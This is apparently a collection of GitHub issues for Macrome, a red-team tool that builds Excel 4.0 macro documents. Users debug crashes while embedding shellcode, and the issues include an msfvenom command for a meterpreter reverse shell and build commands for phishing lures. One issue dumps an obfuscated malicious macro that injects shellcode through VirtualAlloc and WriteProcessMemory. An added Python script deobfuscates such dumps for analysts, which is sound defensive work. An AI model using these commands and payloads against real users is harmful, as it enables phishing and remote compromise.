michaelweber / macrome
Excel Macro Document Reader/Writer for Red Teamers & Analysts
License: MIT License
First, thanks for sharing such a great tool, but it crashes when using Cobalt Strike raw shellcode. Any idea why? Thanks.
Hello @michaelweber first of all thanks for this amazing tool!
I am playing around with this tool and testing locally, and all works. Now that I'm onto the Macros section, I read it can import your own created macros.
My macro_example.txt is this one:
=ALERT("Excel document is outdated")
=QUIT()
I run Macrome.dll build --decoy-document decoy_document.xls --payload macro_example.txt --payload-type Macro and I get this error:
Unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidOperationException: Sequence contains no elements
As you can see it uses a very basic, simple macro, and I can't get it working. If you can give me any clue or anything I would appreciate it, thanks @michaelweber
Hi,
Auto_Open never triggers in the Excel 2019 32-bit (Language: Turkish) version.
I have tried it with both Macrome and the test macro below with International Macro Sheet. I am also sending the sample file attached.
=EXEC("notepad.exe")
=HALT()
Do you have any advice?
Does not work on Office 16 and 2019, x64.
A crash occurs and it exits.
My command:
./Macrome build --decoy-document Docs/decoy_document.xls --payload Docs/popcalc.bin --payload64-bit Docs/popcalc64.bin
Build file:
poc.zip
Hi. Great work! Does it need a specific version of the dotnet SDK installed? I installed the latest one for Windows on a Windows 10 VM and built it without issues. When I run the DLL with the command "dotnet macrome.dll --build etc etc etc..." I get an error stating that version 2.0 is not installed on the machine, and it gives me the URL to download it. It's no longer supported, but I guess I can find it somewhere; the question is "do I really need it?". Thanks!
I have no idea why this happens, but if you use the --password flag, your decoy document can't have a normal embedded image. To get around this my example uses a tiled background, but that's not something you're going to use in a common phishing lure.
I get the following errors when trying to dump a malicious spreadsheet:
C:\Users\jm460\Downloads\macrome>Macrome.exe dump --path C:\Users\jm460\Downloads\macrome\deobfuscated.xls
BoundSheet8 (0x10 bytes) - flags: 0x0 | SheetType: Macrosheet | HiddenState: Visible | Name [unicode=False]: qUKYONz;
BoundSheet8 (0xE bytes) - flags: 0x0 | SheetType: Worksheet | HiddenState: Visible | Name [unicode=False]: Sheet1
BIFF RecordType: SupBook - Length: 4
BIFF RecordType: ExternSheet - Length: 14
Lbl (0x1D bytes) - flags: 0xB | fBuiltin: False | fHidden: True | Name [unicode=False]: _xlfn.BITXOR | Formula: #NAME?
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: ajeZFUwb
Lbl (0x20 bytes) - flags: 0x20 | fBuiltin: True | fHidden: False | Name [unicode=False]: Auto_Open1uto_Open1 !AUTO_OPEN! | Formula: qUKYONz;!A1
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button144_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button145_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button146_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button147_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button148_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button149_Click
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: cecvdVub
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: ikXOTAkJ
Lbl (0x1B bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: JIpHQ | Formula: qUKYONz;!F1
Lbl (0x15 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: KtyKQp
Lbl (0x15 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: viaBBg
Formula[A1]: ACTIVATE("qUKYONz;")
Formula[F1]: ARGUMENT("KtyKQp",2)
Formula[A2]: JIpHQ("=RE"&"GIS"&"TER(CHAR(109)&CHAR(115)&CHAR(118)&CHAR(99)&CHAR(114)&CHAR(116), CHAR(103)&CHAR(101)&CHAR(116)&CHAR(101)&CHAR(110)&CHAR(118), ""CC"", ""ajeZFUwb"", , 1, 9)")
Formula[F2]: FORMULA(KtyKQp,F3)
Formula[A3]: ajeZFUwb("USERDOMAIN")
Formula[A4]: IF(ISNUMBER(SEARCH("64",GET.WORKSPACE(1))))
Formula[F4]: FORMULA("",F3)
Formula[A5]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"", CHAR(86)&CHAR(105)&CHAR(114)&CHAR(116)&CHAR(117)&CHAR(97)&CHAR(108)&CHAR(65)&CHAR(108)&CHAR(108)&CHAR(111)&CHAR(99), ""JJJJJ"", ""cecvdVub"", , 1, 9)")
Formula[F5]: RETURN()
Formula[A6]: SET.VALUE(C6,0)
Formula[A7]: SET.VALUE(C7,65536)
Formula[A8]: WHILE(C6=0)
Formula[A9]: SET.VALUE(C7,C7+8192)
Formula[A10]: cecvdVub(C7,1024,12288,64)
Formula[A11]: SET.VALUE(C6,A10)
Formula[A12]: NEXT()
Formula[A13]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"",CHAR(87)&CHAR(114)&CHAR(105)&CHAR(116)&CHAR(101)&CHAR(80)&CHAR(114)&""oces""&CHAR(115)&CHAR(77)&CHAR(101)&CHAR(109)&CHAR(111)&CHAR(114)&CHAR(121),""JJJCJE"",""viaBBg"",,1,9)")
Unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidOperationException: Stack empty.
at System.Collections.Generic.Stack`1.ThrowForEmptyStack()
at System.Collections.Generic.Stack`1.Pop()
at b2xtranslator.xls.XlsFileFormat.PtgHelper.GetFormulaStringInner(Stack`1& ptgStack, Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\PtgHelper.cs:line 255
at b2xtranslator.xls.XlsFileFormat.PtgHelper.GetFormulaString(Stack`1 ptgStack, Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\PtgHelper.cs:line 370
at b2xtranslator.Spreadsheet.XlsFileFormat.Records.Formula.ToFormulaString(Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\Records\Formula.cs:line 261
at Macrome.BiffRecordExtensions.ToHexDumpString(BiffRecord record, Int32 maxLength, Boolean showAttrInfo) in C:\Users\Weber\source\repos\michaelweber\Macrome\BiffRecordExtensions.cs:line 85
at Macrome.Program.Dump(FileInfo path, Boolean dumpAll, Boolean showAttrInfo, Boolean dumpHexBytes) in C:\Users\Weber\source\repos\michaelweber\Macrome\Program.cs:line 85
--- End of inner exception stack trace ---
at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments)
at System.CommandLine.Invocation.ModelBindingCommandHandler.d__8.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Invocation.InvocationPipeline.<>c__DisplayClass4_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__20_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass15_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass24_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass22_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__21_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__19_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__11_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__10_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass13_0.<b__0>d.MoveNext()
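The dump quoted in this issue shows the usual XLM pattern an analyst has to undo by hand: REGISTER() calls whose module and function names are assembled from CHAR() pieces, each bound to a random alias (cecvdVub, viaBBg) that later cells call as if it were a normal function. The helper below is an added triage example, not part of Macrome or the b2xtranslator code it wraps: it reads Formula[...] lines in the shape Macrome's dump prints, textually folds the CHAR()/& concatenations, records every REGISTER alias, rewrites later alias calls to the real API name, and flags registrations of memory-manipulation APIs. The sample dump and the API watchlist are constructed for this example; the line format is the one shown above.

```python
import re

# Constructed sample in the shape of Macrome's `dump` output (the Formula[] lines
# mirror the ones quoted in the issue above; no real workbook is parsed here).
SAMPLE_DUMP = r'''
Formula[A1]: ACTIVATE("qUKYONz;")
Formula[F1]: ARGUMENT("KtyKQp",2)
Formula[A2]: JIpHQ("=RE"&"GIS"&"TER(CHAR(109)&CHAR(115)&CHAR(118)&CHAR(99)&CHAR(114)&CHAR(116), CHAR(103)&CHAR(101)&CHAR(116)&CHAR(101)&CHAR(110)&CHAR(118), ""CC"", ""ajeZFUwb"", , 1, 9)")
Formula[A5]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"", CHAR(86)&CHAR(105)&CHAR(114)&CHAR(116)&CHAR(117)&CHAR(97)&CHAR(108)&CHAR(65)&CHAR(108)&CHAR(108)&CHAR(111)&CHAR(99), ""JJJJJ"", ""cecvdVub"", , 1, 9)")
Formula[A10]: cecvdVub(C7,1024,12288,64)
Formula[A13]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"",CHAR(87)&CHAR(114)&CHAR(105)&CHAR(116)&CHAR(101)&CHAR(80)&CHAR(114)&""oces""&CHAR(115)&CHAR(77)&CHAR(101)&CHAR(109)&CHAR(111)&CHAR(114)&CHAR(121),""JJJCJE"",""viaBBg"",,1,9)")
'''

# Watchlist chosen for this example: Win32 APIs whose registration from a macro
# sheet is almost never legitimate and should be escalated by an analyst.
SUSPICIOUS_APIS = {
    "virtualalloc", "writeprocessmemory", "createthread", "createremotethread",
    "rtlcopymemory", "loadlibrarya", "getprocaddress", "urldownloadtofilea",
}

FORMULA_RE = re.compile(r"^Formula\[(?P<cell>[A-Z]+\d+)\]:\s*(?P<body>.*)$")
CHAR_RE = re.compile(r"CHAR\((\d+)\)")
# REGISTER(module, function, type_text, alias, ...): we only need the first four args.
REGISTER_RE = re.compile(
    r"REGISTER\(\s*([^,()]+?)\s*,\s*([^,()]+?)\s*,\s*([^,()]*?)\s*,\s*([^,()]+?)\s*,",
    re.IGNORECASE,
)
CALL_HEAD_RE = re.compile(r"^([A-Za-z_]\w*)\(")


def deobfuscate(expr: str) -> str:
    """Textually fold XLM string building: CHAR(n) pieces, & concatenation and
    doubled quotes. This is a lexical approximation, not an evaluator."""
    s = expr.replace('""', '"')                                   # XLM escaped quote
    s = CHAR_RE.sub(lambda m: chr(int(m.group(1))), s)            # CHAR(86) -> V
    s = re.sub(r'"\s*&\s*"', "", s)                               # "RE"&"GIS" -> "REGIS"
    s = re.sub(r"\s*&\s*", "", s)                                 # V&i&r -> Vir
    return s.replace('"', "")


def triage(dump_text: str):
    """Return (aliases, findings): aliases maps REGISTER alias -> (module, function);
    findings lists (cell, api, resolved_formula) for watchlisted APIs, in dump order."""
    aliases = {}
    findings = []
    for line in dump_text.splitlines():
        m = FORMULA_RE.match(line.strip())
        if not m:
            continue
        cell, decoded = m.group("cell"), deobfuscate(m.group("body"))
        # Record every REGISTER binding, flag the dangerous ones at registration time.
        for reg in REGISTER_RE.finditer(decoded):
            module, func, _type_text, alias = reg.groups()
            aliases[alias] = (module, func)
            if func.lower() in SUSPICIOUS_APIS:
                findings.append((cell, func, decoded))
        # Resolve later calls through an alias back to the real API name.
        head = CALL_HEAD_RE.match(decoded)
        if head and head.group(1) in aliases:
            _module, func = aliases[head.group(1)]
            resolved = func + decoded[len(head.group(1)):]
            if func.lower() in SUSPICIOUS_APIS:
                findings.append((cell, func, resolved))
    return aliases, findings


if __name__ == "__main__":
    found_aliases, found = triage(SAMPLE_DUMP)
    for alias, (module, func) in found_aliases.items():
        print(f"alias {alias} -> {module}!{func}")
    for cell, api, formula in found:
        print(f"[{cell}] {api}: {formula}")
```

Because the folding is purely textual, it cannot follow values that only exist at run time (for instance a name written into a cell by FORMULA() and read back later), so treat the output as a triage aid for reading the dump, not as proof of what the sheet executes. The dump in the issue already tells you the order in which aliases get bound, so any alias call that appears before its REGISTER line would simply be left unresolved.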
Macro provided by Excelntdonut using --obfuscate on Excelntdonut says the formula is too long, maximum 255 characters.
Decoy documents should be able to have any number of sheets - right now it's essentially hard coded to assume the sheet is in position 1. This should be fixed.
Build args like: .\Macrome.exe build --decoy-document 1.xls --payload payload.bin --payload-method Base64 --method ArgumentSubroutines --password VelvetSweatshop --output-file-name ReadyToPhish11.xls on Win11, x64 version.
Hi,
I tried to use it and get an error about the format of cells. I took screenshots:
https://ibb.co/TBR5bP5
https://ibb.co/HNScKb1
Then GoTo and the contents of the cell with the error are
=FORMULA($FE$512;$A$1)
Command for generating, very basic:
Macrome.exe build --decoy-document decoy_document.xls --payload popcalc.bin --output-file-name CharSubroutine-Macro_calc32.xls
OS version and Excel: Windows 10, Excel 2016 32-bit.
I do not know what else to add, except that I can do the PoC from the article https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/ for calc32 or for Metasploit on the same machine and Excel.
Like id = 1, blankGraph.
In the MS document, the record enum begins at 6.
Can you guys provide some help information about where these record names (and field info) come from? Thanks for this inspiring code.
It appears that some of my Unicode fun for obfuscating the Auto_Open label doesn't fly on the macOS version of Office. It should be possible to disable the obfuscation (which currently ALWAYS happens regardless of what you call your label) with a flag. I suspect this is also breaking auto_open functionality for some international language settings.
How do I use this with PuTTY rather than the popcalc or Metasploit generated payload?
msfvenom -a x86 -b '\x00' -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1123 EXITFUNC=thread -f raw > t86.bin
dotnet Macrome.dll build --decoy-document decoy_document.xls --payload t86.bin
When I open output.xls, it crashes when I enable macros.